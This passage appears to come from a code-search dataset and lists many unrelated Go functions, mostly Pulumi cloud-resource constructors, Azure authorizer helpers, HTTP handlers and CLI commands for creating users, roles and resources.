args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func NewAuthorization(req *http.Request) (a *Authorization, err error) {\n\tcontent := req.Header.Get(headKeyAuthorization)\n\tif len(content) > 0 {\n\t\treturn newAuthorizationByHeader(content)\n\t}\n\treturn newAuthorizationByQueryValues(req.URL.Query())\n}", "func NewAuthorizerFromFile(resourceBaseURI string) (autorest.Authorizer, error) {\n\tsettings, err := GetSettingsFromFile()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn settings.GetAuthorizer(resourceBaseURI)\n}", "func NewDistribution(ctx *pulumi.Context,\n\tname string, args *DistributionArgs, opts ...pulumi.ResourceOpt) (*Distribution, error) {\n\tif args == nil || args.DefaultCacheBehavior == nil {\n\t\treturn nil, errors.New(\"missing required argument 'DefaultCacheBehavior'\")\n\t}\n\tif args == nil || args.Enabled == nil {\n\t\treturn nil, errors.New(\"missing required argument 'Enabled'\")\n\t}\n\tif args == nil || args.Origins == nil {\n\t\treturn nil, errors.New(\"missing required argument 'Origins'\")\n\t}\n\tif args == nil || args.Restrictions == nil {\n\t\treturn nil, errors.New(\"missing required argument 'Restrictions'\")\n\t}\n\tif args == nil || args.ViewerCertificate == nil {\n\t\treturn nil, errors.New(\"missing required argument 'ViewerCertificate'\")\n\t}\n\tinputs := make(map[string]interface{})\n\tif args == nil {\n\t\tinputs[\"aliases\"] = nil\n\t\tinputs[\"comment\"] = nil\n\t\tinputs[\"customErrorResponses\"] = nil\n\t\tinputs[\"defaultCacheBehavior\"] = nil\n\t\tinputs[\"defaultRootObject\"] = nil\n\t\tinputs[\"enabled\"] = nil\n\t\tinputs[\"httpVersion\"] = nil\n\t\tinputs[\"isIpv6Enabled\"] = nil\n\t\tinputs[\"loggingConfig\"] = nil\n\t\tinputs[\"orderedCacheBehaviors\"] = nil\n\t\tinputs[\"origins\"] = nil\n\t\tinputs[\"originGroups\"] = nil\n\t\tinputs[\"priceClass\"] = nil\n\t\tinputs[\"restrictions\"] = nil\n\t\tinputs[\"retainOnDelete\"] = nil\n\t\tinputs[\"tags\"] = nil\n\t\tinputs[\"viewerCertificate\"] = nil\n\t\tinputs[\"waitForDeployment\"] = nil\n\t\tinputs[\"webAclId\"] = nil\n\t} else {\n\t\tinputs[\"aliases\"] = args.Aliases\n\t\tinputs[\"comment\"] = args.Comment\n\t\tinputs[\"customErrorResponses\"] = args.CustomErrorResponses\n\t\tinputs[\"defaultCacheBehavior\"] = args.DefaultCacheBehavior\n\t\tinputs[\"defaultRootObject\"] = args.DefaultRootObject\n\t\tinputs[\"enabled\"] = args.Enabled\n\t\tinputs[\"httpVersion\"] = args.HttpVersion\n\t\tinputs[\"isIpv6Enabled\"] = args.IsIpv6Enabled\n\t\tinputs[\"loggingConfig\"] = args.LoggingConfig\n\t\tinputs[\"orderedCacheBehaviors\"] = args.OrderedCacheBehaviors\n\t\tinputs[\"origins\"] = args.Origins\n\t\tinputs[\"originGroups\"] = args.OriginGroups\n\t\tinputs[\"priceClass\"] = args.PriceClass\n\t\tinputs[\"restrictions\"] = args.Restrictions\n\t\tinputs[\"retainOnDelete\"] = args.RetainOnDelete\n\t\tinputs[\"tags\"] = args.Tags\n\t\tinputs[\"viewerCertificate\"] = args.ViewerCertificate\n\t\tinputs[\"waitForDeployment\"] = args.WaitForDeployment\n\t\tinputs[\"webAclId\"] = args.WebAclId\n\t}\n\tinputs[\"activeTrustedSigners\"] = nil\n\tinputs[\"arn\"] = nil\n\tinputs[\"callerReference\"] = nil\n\tinputs[\"domainName\"] = nil\n\tinputs[\"etag\"] = nil\n\tinputs[\"hostedZoneId\"] = nil\n\tinputs[\"inProgressValidationBatches\"] = nil\n\tinputs[\"lastModifiedTime\"] = nil\n\tinputs[\"status\"] = nil\n\ts, err := ctx.RegisterResource(\"aws:cloudfront/distribution:Distribution\", name, true, inputs, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &Distribution{s: s}, nil\n}", "func NewProvider(username string, password string) *Provider {\n transport := httptransport.New(\"api.autodns.com\", \"/v1\", []string{\"https\"})\n transport.DefaultAuthentication = httptransport.BasicAuth(username, password)\n\n formats := strfmt.Default\n\n return &Provider{\n username: username,\n password: password,\n client: zone_tasks.New(transport, formats),\n }\n}", "func Register(authMod common.Authorizer, d models.UserStore, w http.ResponseWriter, r *http.Request) {\n\n\t//get data from request\n\tdecoder := json.NewDecoder(r.Body)\n\tbody := models.User{}\n\terr := decoder.Decode(&body)\n\tif err != nil {\n\t\tcommon.DisplayAppError(w, err, \"Invalid user data\", http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\t//create new user\n\tuserId, err := d.CreateUser(body)\n\tif err != nil {\n\t\tcommon.DisplayAppError(w, err, \"Invalid user data\", http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\t//create JWT\n\tjwt, err := authMod.GenerateJWT(\n\t\tbody.UserName,\n\t\tuserId,\n\t)\n\tif err != nil {\n\t\tcommon.DisplayAppError(w, err, \"fail up\", http.StatusInternalServerError)\n\t\treturn\n\t}\n\treturnUser := CreatedUser{\n\t\tbody.UserName,\n\t\tbody.Email,\n\t\tjwt,\n\t}\n\tcommon.WriteJson(w, \"Succesfully registered user\", returnUser, http.StatusCreated)\n}", "func New(authenticator auth.Authenticator) clevergo.MiddlewareFunc {\n\treturn func(next clevergo.Handle) clevergo.Handle {\n\t\treturn func(c *clevergo.Context) error {\n\t\t\tidentity, err := authenticator.Authenticate(c.Request, c.Response)\n\t\t\tif err != nil {\n\t\t\t\tlog.Println(err)\n\t\t\t\tauthenticator.Challenge(c.Request, c.Response)\n\t\t\t} else {\n\t\t\t\tc.WithValue(auth.IdentityKey, identity)\n\t\t\t}\n\t\t\treturn next(c)\n\t\t}\n\t}\n}", "func NewTracker(ctx *pulumi.Context,\n\tname string, args *TrackerArgs, opts ...pulumi.ResourceOption) (*Tracker, error) {\n\tif args == nil {\n\t\treturn nil, errors.New(\"missing one or more required arguments\")\n\t}\n\n\tif args.TrackerName == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'TrackerName'\")\n\t}\n\tvar resource Tracker\n\terr := ctx.RegisterResource(\"aws:location/tracker:Tracker\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func NewCreate(f func(string, string, []string) (proto.Message, error)) *cobra.Command {\n\tvar (\n\t\tdisplayName string\n\t\tpermissionIDs []string\n\t)\n\n\tcmd := template.NewArg1Proto(\"create ROLE_ID\", \"Create a new role\", func(cmd *cobra.Command, arg string) (proto.Message, error) {\n\t\tvar names []string\n\t\tfor _, p := range permissionIDs {\n\t\t\tnames = append(names, fmt.Sprintf(\"permissions/%s\", p))\n\t\t}\n\t\treturn f(arg, displayName, names)\n\t})\n\n\tcmd.Flags().StringVar(&displayName, \"display-name\", \"\", \"display name\")\n\tcmd.Flags().StringSliceVar(&permissionIDs, \"permission-ids\", nil, \"permission ids\")\n\n\treturn cmd\n}", "func NewCreator(ctx *pulumi.Context,\n\tname string, args *CreatorArgs, opts ...pulumi.ResourceOption) (*Creator, error) {\n\tif args == nil || args.AccountName == nil {\n\t\treturn nil, errors.New(\"missing required argument 'AccountName'\")\n\t}\n\tif args == nil || args.CreatorName == nil {\n\t\treturn nil, errors.New(\"missing required argument 'CreatorName'\")\n\t}\n\tif args == nil || args.Location == nil {\n\t\treturn nil, errors.New(\"missing required argument 'Location'\")\n\t}\n\tif args == nil || args.ResourceGroupName == nil {\n\t\treturn nil, errors.New(\"missing required argument 'ResourceGroupName'\")\n\t}\n\tif args == nil {\n\t\targs = &CreatorArgs{}\n\t}\n\tvar resource Creator\n\terr := ctx.RegisterResource(\"azure-nextgen:maps/v20200201preview:Creator\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func AuthorizeCreate(db *gorm.DB, data *Authorize) (err error) {\n\tdata.Ctime = time.Now().Unix()\n\n\tif err = db.Create(data).Error; err != nil {\n\t\tmus.Logger.Error(\"create authorize error\", zap.Error(err))\n\t\treturn\n\t}\n\treturn\n}", "func NewSubscription(ctx *pulumi.Context,\n\tname string, args *SubscriptionArgs, opts ...pulumi.ResourceOption) (*Subscription, error) {\n\tif args == nil {\n\t\treturn nil, errors.New(\"missing one or more required arguments\")\n\t}\n\n\tif args.SubscriptionId == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'SubscriptionId'\")\n\t}\n\treplaceOnChanges := pulumi.ReplaceOnChanges([]string{\n\t\t\"location\",\n\t\t\"project\",\n\t\t\"subscriptionId\",\n\t})\n\topts = append(opts, replaceOnChanges)\n\topts = internal.PkgResourceDefaultOpts(opts)\n\tvar resource Subscription\n\terr := ctx.RegisterResource(\"google-native:pubsublite/v1:Subscription\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func NewSyncAuthorization(ctx *pulumi.Context,\n\tname string, args *SyncAuthorizationArgs, opts ...pulumi.ResourceOption) (*SyncAuthorization, error) {\n\tif args == nil {\n\t\treturn nil, errors.New(\"missing one or more required arguments\")\n\t}\n\n\tif args.Identities == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'Identities'\")\n\t}\n\topts = internal.PkgResourceDefaultOpts(opts)\n\tvar resource SyncAuthorization\n\terr := ctx.RegisterResource(\"gcp:apigee/syncAuthorization:SyncAuthorization\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func CreateUser(c *gin.Context) {}", "func NewAuthorizerFromFile(baseURI string) (autorest.Authorizer, error) {\n\tfile, err := getAuthFile()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tresource, err := getResourceForToken(*file, baseURI)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn NewAuthorizerFromFileWithResource(resource)\n}", "func (mr *MockInterfaceMockRecorder) NewMSIAuthorizer(arg0 interface{}, arg1 ...interface{}) *gomock.Call {\n\tmr.mock.ctrl.T.Helper()\n\tvarargs := append([]interface{}{arg0}, arg1...)\n\treturn mr.mock.ctrl.RecordCallWithMethodType(mr.mock, \"NewMSIAuthorizer\", reflect.TypeOf((*MockInterface)(nil).NewMSIAuthorizer), varargs...)\n}", "func Create(namespace string, resourceAndArgs ...string) (err error) {\n\tcreate := []string{\"create\", \"-n\", namespace}\n\t_, err = kubectl(append(create, resourceAndArgs...)...)\n\treturn\n}", "func (opts resourceOptions) newResource() *resource.Resource {\n\treturn &resource.Resource{\n\t\tGVK: resource.GVK{ // Remove whitespaces to prevent values like \" \" pass validation\n\t\t\tGroup: strings.TrimSpace(opts.Group),\n\t\t\tDomain: strings.TrimSpace(opts.Domain),\n\t\t\tVersion: strings.TrimSpace(opts.Version),\n\t\t\tKind: strings.TrimSpace(opts.Kind),\n\t\t},\n\t\tPlural: resource.RegularPlural(opts.Kind),\n\t\tAPI: &resource.API{},\n\t\tWebhooks: &resource.Webhooks{},\n\t}\n}", "func NewCreateOIDCIssuerCmd() *cobra.Command {\n\tcreateOIDCIssuerCmd := &cobra.Command{\n\t\tUse: \"create-oidc-issuer --name NAME --region REGION --subscription-id SUBSCRIPTION_ID --tenant-id TENANT_ID --public-key-file PUBLIC_KEY_FILE\",\n\t\tShort: \"Create OIDC Issuer\",\n\t\tRun: createOIDCIssuerCmd,\n\t\tPersistentPreRun: initEnvForCreateOIDCIssuerCmd,\n\t}\n\n\t// Required parameters\n\tcreateOIDCIssuerCmd.PersistentFlags().StringVar(\n\t\t&CreateOIDCIssuerOpts.Name,\n\t\t\"name\",\n\t\t\"\",\n\t\t\"User-defined name for all created Azure resources. This user-defined name can be separate from the cluster's infra-id. \"+\n\t\t\tfmt.Sprintf(\"Azure resources created by ccoctl will be tagged with '%s_NAME = %s'\", ownedAzureResourceTagKeyPrefix, ownedAzureResourceTagValue),\n\t)\n\tcreateOIDCIssuerCmd.MarkPersistentFlagRequired(\"name\")\n\tcreateOIDCIssuerCmd.PersistentFlags().StringVar(&CreateOIDCIssuerOpts.Region, \"region\", \"\", \"Azure region in which to create identity provider infrastructure\")\n\tcreateOIDCIssuerCmd.MarkPersistentFlagRequired(\"region\")\n\tcreateOIDCIssuerCmd.PersistentFlags().StringVar(&CreateOIDCIssuerOpts.SubscriptionID, \"subscription-id\", \"\", \"Azure Subscription ID within which to create identity provider infrastructure\")\n\tcreateOIDCIssuerCmd.MarkPersistentFlagRequired(\"subscription-id\")\n\tcreateOIDCIssuerCmd.PersistentFlags().StringVar(&CreateOIDCIssuerOpts.TenantID, \"tenant-id\", \"\", \"Azure Tenant ID in which identity provider infrastructure will be created\")\n\tcreateOIDCIssuerCmd.MarkPersistentFlagRequired(\"tenant-id\")\n\tcreateOIDCIssuerCmd.PersistentFlags().StringVar(&CreateOIDCIssuerOpts.PublicKeyPath, \"public-key-file\", \"\", \"Path to public ServiceAccount signing key\")\n\tcreateOIDCIssuerCmd.MarkPersistentFlagRequired(\"public-key-file\")\n\n\t// Optional parameters\n\tcreateOIDCIssuerCmd.PersistentFlags().StringVar(\n\t\t&CreateOIDCIssuerOpts.OIDCResourceGroupName,\n\t\t\"oidc-resource-group-name\",\n\t\t\"\",\n\t\t// FIXME: Say what the default is gonna be, ie -oidc appended to the --name.\n\t\t\"The Azure resource group in which to create OIDC infrastructure including a storage account, blob storage container and user-assigned managed identities. \"+\n\t\t\t\"A resource group will be created with a name derived from the --name parameter if an --oidc-resource-group-name parameter was not provided.\",\n\t)\n\tcreateOIDCIssuerCmd.PersistentFlags().StringVar(\n\t\t&CreateOIDCIssuerOpts.StorageAccountName,\n\t\t\"storage-account-name\",\n\t\t\"\",\n\t\t\"The name of the Azure storage account in which to create OIDC issuer infrastructure. \"+\n\t\t\t\"A storage account will be created with a name derived from the --name parameter if a --storage-account-name parameter was not provided. \"+\n\t\t\t\"The storage account will be created within the OIDC resource group identified by the --oidc-resource-group-name parameter. \"+\n\t\t\t\"If pre-existing, the storage account must exist within the OIDC resource group identified by the --oidc-resource-group-name parameter. \"+\n\t\t\t\"Azure storage account names must be between 3 and 24 characters in length and may contain numbers and lowercase letters only.\",\n\t)\n\tcreateOIDCIssuerCmd.PersistentFlags().StringVar(\n\t\t&CreateOIDCIssuerOpts.BlobContainerName,\n\t\t\"blob-container-name\",\n\t\t\"\",\n\t\t\"The name of the Azure blob container in which to upload OIDC discovery documents. \"+\n\t\t\t\"A blob container will be created with a name derived from the --name parameter if a --blob-container-name parameter was not provided. \"+\n\t\t\t\"The blob container will be created within the OIDC resource group identified by the --oidc-resource-group-name parameter \"+\n\t\t\t\"and storage account identified by --storage-account-name.\",\n\t)\n\tcreateOIDCIssuerCmd.PersistentFlags().BoolVar(&CreateOIDCIssuerOpts.DryRun, \"dry-run\", false, \"Skip creating objects, and just save what would have been created into files\")\n\tcreateOIDCIssuerCmd.PersistentFlags().StringVar(&CreateOIDCIssuerOpts.OutputDir, \"output-dir\", \"\", \"Directory to place generated manifest files. Defaults to the current directory.\")\n\tcreateOIDCIssuerCmd.PersistentFlags().StringToStringVar(&CreateOIDCIssuerOpts.UserTags, \"user-tags\", map[string]string{}, \"User tags to be applied to Azure resources, multiple tags may be specified comma-separated for example: --user-tags key1=value1,key2=value2\")\n\n\treturn createOIDCIssuerCmd\n}", "func CreateRendezvous(w http.ResponseWriter, r *http.Request) {\n\tname := rands(20)\n\tsig, err := fernet.EncryptAndSign([]byte(name), fernetKey)\n\tif err != nil {\n\t\tlog.Println(\"error signing app name:\", err)\n\t\thttp.Error(w, \"internal error\", 500)\n\t\treturn\n\t}\n\tw.WriteHeader(201)\n\turl := \"https://\" + name + \":\" + string(sig) + \"@route.webx.io/\"\n\tio.WriteString(w, url)\n}", "func (c *ResourcesHandler) Create(e event.CreateEvent, q workqueue.RateLimitingInterface) {\n\tc.doHandle(e.Object.GetNamespace(), e.Object.GetName(), e.Object.GetObjectKind().GroupVersionKind().Kind, q)\n}", "func CreateAuthor(w http.ResponseWriter, r *http.Request) {\n\tfmt.Println(\"Endpoint Hit: create new author\")\n\n\treqBody, _ := ioutil.ReadAll(r.Body)\n\tvar author models.Author\n\tjson.Unmarshal(reqBody, &author)\n\n\terr := author.Validate()\n\tif err != nil {\n\t\tresponses.RespondWithError(w, http.StatusUnprocessableEntity, err)\n\t\treturn\n\t}\n\n\tresult := DB.Create(&author)\n\tif result.Error != nil {\n\t\tlog.Println(result.Error)\n\t\tresponses.RespondWithError(w, http.StatusBadRequest, result.Error)\n\t\treturn\n\t}\n\n\tresponses.RespondWithJSON(w, http.StatusOK, author)\n}", "func resourceKibanaUserSpaceCreate(d *schema.ResourceData, meta interface{}) error {\n\tname := d.Get(\"name\").(string)\n\tdescription := d.Get(\"description\").(string)\n\tdisabledFeatures := convertArrayInterfaceToArrayString(d.Get(\"disabled_features\").(*schema.Set).List())\n\tinitials := d.Get(\"initials\").(string)\n\tcolor := d.Get(\"color\").(string)\n\n\tclient, err := getClient(meta.(*ProviderConf))\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tuserSpace := &kbapi.KibanaSpace{\n\t\tID: name,\n\t\tName: name,\n\t\tDescription: description,\n\t\tDisabledFeatures: disabledFeatures,\n\t\tInitials: initials,\n\t\tColor: color,\n\t}\n\n\t_, err = client.API.KibanaSpaces.Create(userSpace)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\td.SetId(name)\n\n\tlog.Infof(\"Created user space %s successfully\", name)\n\n\treturn resourceKibanaUserSpaceRead(d, meta)\n}", "func Create(ctx context.Context, name string, opts map[string]interface{}) (Gatherer, error) {\n\tcreatorMu.RLock()\n\tc, ok := creators[name]\n\tcreatorMu.RUnlock()\n\n\tif !ok {\n\t\treturn nil, fmt.Errorf(\"%s gatherer creator not registered\", name)\n\t}\n\n\tg, err := c.Create(ctx, opts)\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tlog.Logger.Debugf(\"%s gatherer created\", name)\n\treturn g, nil\n}", "func (mr *MockCoreMockRecorder) NewMSIAuthorizer(arg0 interface{}, arg1 ...interface{}) *gomock.Call {\n\tmr.mock.ctrl.T.Helper()\n\tvarargs := append([]interface{}{arg0}, arg1...)\n\treturn mr.mock.ctrl.RecordCallWithMethodType(mr.mock, \"NewMSIAuthorizer\", reflect.TypeOf((*MockCore)(nil).NewMSIAuthorizer), varargs...)\n}", "func NewSubscription(ctx *pulumi.Context,\n\tname string, args *SubscriptionArgs, opts ...pulumi.ResourceOption) (*Subscription, error) {\n\tif args == nil {\n\t\targs = &SubscriptionArgs{}\n\t}\n\n\topts = internal.PkgResourceDefaultOpts(opts)\n\tvar resource Subscription\n\terr := ctx.RegisterResource(\"google-native:pubsub/v1beta1a:Subscription\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func NewApi(ctx *pulumi.Context,\n\tname string, args *ApiArgs, opts ...pulumi.ResourceOption) (*Api, error) {\n\tif args == nil {\n\t\treturn nil, errors.New(\"missing one or more required arguments\")\n\t}\n\n\tif args.OrganizationId == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'OrganizationId'\")\n\t}\n\treplaceOnChanges := pulumi.ReplaceOnChanges([]string{\n\t\t\"organizationId\",\n\t})\n\topts = append(opts, replaceOnChanges)\n\topts = internal.PkgResourceDefaultOpts(opts)\n\tvar resource Api\n\terr := ctx.RegisterResource(\"google-native:apigee/v1:Api\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func NewAssociation(ctx *pulumi.Context,\n\tname string, args *AssociationArgs, opts ...pulumi.ResourceOption) (*Association, error) {\n\tif args == nil {\n\t\treturn nil, errors.New(\"missing one or more required arguments\")\n\t}\n\n\tif args.LicenseConfigurationArn == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'LicenseConfigurationArn'\")\n\t}\n\tif args.ResourceArn == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'ResourceArn'\")\n\t}\n\tvar resource Association\n\terr := ctx.RegisterResource(\"aws:licensemanager/association:Association\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func (c *Cfg) Authorizer(resource string) autorest.Authorizer {\n\tc.mu.Lock()\n\tdefer c.mu.Unlock()\n\tauthz := c.authz[resource]\n\tif authz == nil {\n\t\tauthz = c.newAuthz(resource)\n\t\tif c.authz == nil {\n\t\t\tc.authz = make(map[string]autorest.Authorizer)\n\t\t}\n\t\tc.authz[resource] = authz\n\t}\n\treturn authz\n}", "func NewAdd(f func(string, string) (proto.Message, error)) *cobra.Command {\n\tvar (\n\t\trole string\n\t\tuser string\n\t)\n\n\tcmd := template.NewArg0Proto(\"add\", \"Add a new role binding\", func(cmd *cobra.Command) (proto.Message, error) {\n\t\treturn f(role, user)\n\t})\n\n\tcmd.Flags().StringVar(&role, \"role\", \"\", \"role name\")\n\tcmd.Flags().StringVar(&user, \"user\", \"\", \"user name\")\n\n\treturn cmd\n}", "func (h Handlers[R, T]) CreateOrUpdateResource(r *http.Request) (HandlerResponse, error) {\n\tvar response HandlerResponse\n\tpayload, err := request.Resource[R](r)\n\tif err != nil {\n\t\treturn response, actions.NewError(actions.InvalidArgument, err)\n\t}\n\tmeta := payload.GetMetadata()\n\n\tif meta == nil {\n\t\treturn response, actions.NewError(actions.InvalidArgument, errors.New(\"nil metadata\"))\n\t}\n\n\tif err := checkMeta(*meta, mux.Vars(r), \"id\"); err != nil {\n\t\treturn response, actions.NewError(actions.InvalidArgument, err)\n\t}\n\n\tctx, err := matchHeaderContext(r)\n\tif err != nil {\n\t\treturn response, actions.NewErrorf(actions.InvalidArgument, err)\n\t}\n\tctx = storev2.ContextWithTxInfo(ctx, &response.TxInfo)\n\n\tif claims := jwt.GetClaimsFromContext(ctx); claims != nil {\n\t\tmeta.CreatedBy = claims.StandardClaims.Subject\n\t}\n\n\tgstore := storev2.Of[R](h.Store)\n\n\tif err := gstore.CreateOrUpdate(ctx, payload); err != nil {\n\t\tswitch err := err.(type) {\n\t\tcase *store.ErrPreconditionFailed:\n\t\t\treturn response, actions.NewError(actions.PreconditionFailed, err)\n\t\tcase *store.ErrNotValid:\n\t\t\treturn response, actions.NewError(actions.InvalidArgument, err)\n\t\tdefault:\n\t\t\treturn response, actions.NewError(actions.InternalErr, err)\n\t\t}\n\t}\n\n\treturn response, nil\n}", "func NewRunner(ctx *pulumi.Context,\n\tname string, args *RunnerArgs, opts ...pulumi.ResourceOption) (*Runner, error) {\n\tif args == nil {\n\t\treturn nil, errors.New(\"missing one or more required arguments\")\n\t}\n\n\tif args.RegistrationToken == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'RegistrationToken'\")\n\t}\n\tif args.RegistrationToken != nil {\n\t\targs.RegistrationToken = pulumi.ToSecret(args.RegistrationToken).(pulumi.StringInput)\n\t}\n\tsecrets := pulumi.AdditionalSecretOutputs([]string{\n\t\t\"authenticationToken\",\n\t\t\"registrationToken\",\n\t})\n\topts = append(opts, secrets)\n\topts = internal.PkgResourceDefaultOpts(opts)\n\tvar resource Runner\n\terr := ctx.RegisterResource(\"gitlab:index/runner:Runner\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func createConsumer(c *cli.Context) error {\n\tusername := c.String(\"username\")\n\tcustomID := c.String(\"custom_id\")\n\n\tif username == \"\" && customID == \"\" {\n\t\treturn fmt.Errorf(\"username: %s or custom id: %s invalid\", username, customID)\n\t}\n\n\tcfg := &ConsumerConfig{\n\t\tUsername: username,\n\t\tCustomID: customID,\n\t}\n\n\tctx, cannel := context.WithTimeout(context.Background(), 30*time.Second)\n\tdefer cannel()\n\n\tserverResponse, err := client.GatewayClient.Post(ctx, CONSUMER_RESOURCE_OBJECT, nil, cfg, nil)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tbody, err := ioutil.ReadAll(serverResponse.Body)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\ttools.IndentFromBody(body)\n\n\treturn nil\n}", "func NewResourceGroup(ctx *pulumi.Context,\n\tname string, args *ResourceGroupArgs, opts ...pulumi.ResourceOption) (*ResourceGroup, error) {\n\tif args == nil {\n\t\treturn nil, errors.New(\"missing one or more required arguments\")\n\t}\n\n\tif args.DisplayName == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'DisplayName'\")\n\t}\n\topts = internal.PkgResourceDefaultOpts(opts)\n\tvar resource ResourceGroup\n\terr := ctx.RegisterResource(\"alicloud:resourcemanager/resourceGroup:ResourceGroup\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func NewAuthorizerFromEnvironment() (autorest.Authorizer, error) {\n\tsettings, err := getAuthenticationSettings()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif settings.resource == \"\" {\n\t\tsettings.resource = settings.environment.ResourceManagerEndpoint\n\t}\n\n\treturn settings.getAuthorizer()\n}", "func Initialize(tokenGenerator TokenGenerator, sec Securer, rbac RBAC) Auth {\n\treturn New(neo4j.User{}, tokenGenerator, sec, rbac)\n}", "func NewResourcesCommand(name string, chVars chan data.Vars, logger Logger) cli.Command {\n\tvar vars data.Vars\n\tvar store *data.Store\n\n\t// flag values\n\tvar userId int64\n\tvar groupId int64\n\tvar firstName string\n\tvar lastName string\n\tvar groupName string\n\n\treturn cli.Command{\n\t\tName: name,\n\t\tUsage: \"perform operation on data resources\",\n\t\tBefore: func(context *cli.Context) error {\n\t\t\tvars = <-chVars\n\n\t\t\turl := data.MakeUrl(vars)\n\t\t\tdb, err := sql.Open(\"postgres\", url)\n\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\ts, err := data.NewStore(db, 10)\n\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tstore = s\n\t\t\treturn nil\n\t\t},\n\t\tSubcommands: []cli.Command{\n\t\t\t{\n\t\t\t\tName: \"user:get\",\n\t\t\t\tAction: func(ctx *cli.Context) error {\n\t\t\t\t\tid, err := getIdArg(ctx)\n\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tlogger.Error(errors.Unwrap(err))\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\n\t\t\t\t\tuser, err := store.GetUserById(id)\n\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tlogger.Error(errors.Unwrap(err))\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\n\t\t\t\t\treturn Printed(user)\n\t\t\t\t},\n\t\t\t},\n\t\t\t{\n\t\t\t\tName: \"user:create\",\n\t\t\t\tFlags: []cli.Flag{\n\t\t\t\t\tcli.StringFlag{Name: \"FirstName\", Destination: &firstName, Required: true},\n\t\t\t\t\tcli.StringFlag{Name: \"LastName\", Destination: &lastName, Required: true},\n\t\t\t\t},\n\t\t\t\tAction: func(ctx *cli.Context) error {\n\t\t\t\t\tuser, err := store.CreateUser(&data.User{\n\t\t\t\t\t\tFirstName: firstName,\n\t\t\t\t\t\tLastName: lastName,\n\t\t\t\t\t})\n\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tlogger.Error(errors.Unwrap(err))\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\n\t\t\t\t\treturn Printed(user)\n\t\t\t\t},\n\t\t\t},\n\t\t\t{\n\t\t\t\tName: \"user:update\",\n\t\t\t\tFlags: []cli.Flag{\n\t\t\t\t\tcli.StringFlag{Name: \"FirstName\", Destination: &firstName},\n\t\t\t\t\tcli.StringFlag{Name: \"LastName\", Destination: &lastName},\n\t\t\t\t},\n\t\t\t\tAction: func(ctx *cli.Context) error {\n\t\t\t\t\tid, err := getIdArg(ctx)\n\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tlogger.Error(errors.Unwrap(err))\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\n\t\t\t\t\tfields := getPassedFlagNames(ctx)\n\n\t\t\t\t\terr = store.UpdateUser(id, &data.User{\n\t\t\t\t\t\tFirstName: firstName,\n\t\t\t\t\t\tLastName: lastName,\n\t\t\t\t\t}, fields...)\n\n\t\t\t\t\treturn err\n\t\t\t\t},\n\t\t\t},\n\t\t\t{\n\t\t\t\tName: \"user:delete\",\n\t\t\t\tAction: func(ctx *cli.Context) error {\n\t\t\t\t\tid, err := getIdArg(ctx)\n\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tlogger.Error(errors.Unwrap(err))\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\n\t\t\t\t\treturn store.DeleteUser(id)\n\t\t\t\t},\n\t\t\t},\n\t\t\t{\n\t\t\t\tName: \"users:get\",\n\t\t\t\tFlags: []cli.Flag{\n\t\t\t\t\tcli.Int64Flag{Name: \"GroupId\", Destination: &groupId, Required: true},\n\t\t\t\t},\n\t\t\t\tAction: func(ctx *cli.Context) error {\n\t\t\t\t\tvar users []data.User\n\t\t\t\t\tvar err error\n\n\t\t\t\t\tif ctx.IsSet(\"GroupId\") {\n\t\t\t\t\t\tusers, err = store.GetUsersByGroupId(groupId)\n\t\t\t\t\t}\n\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\n\t\t\t\t\treturn Printed(users)\n\t\t\t\t},\n\t\t\t},\n\t\t\t{\n\t\t\t\tName: \"group:get\",\n\t\t\t\tAction: func(ctx *cli.Context) error {\n\t\t\t\t\tid, err := getIdArg(ctx)\n\n\t\t\t\t\tif err != nil 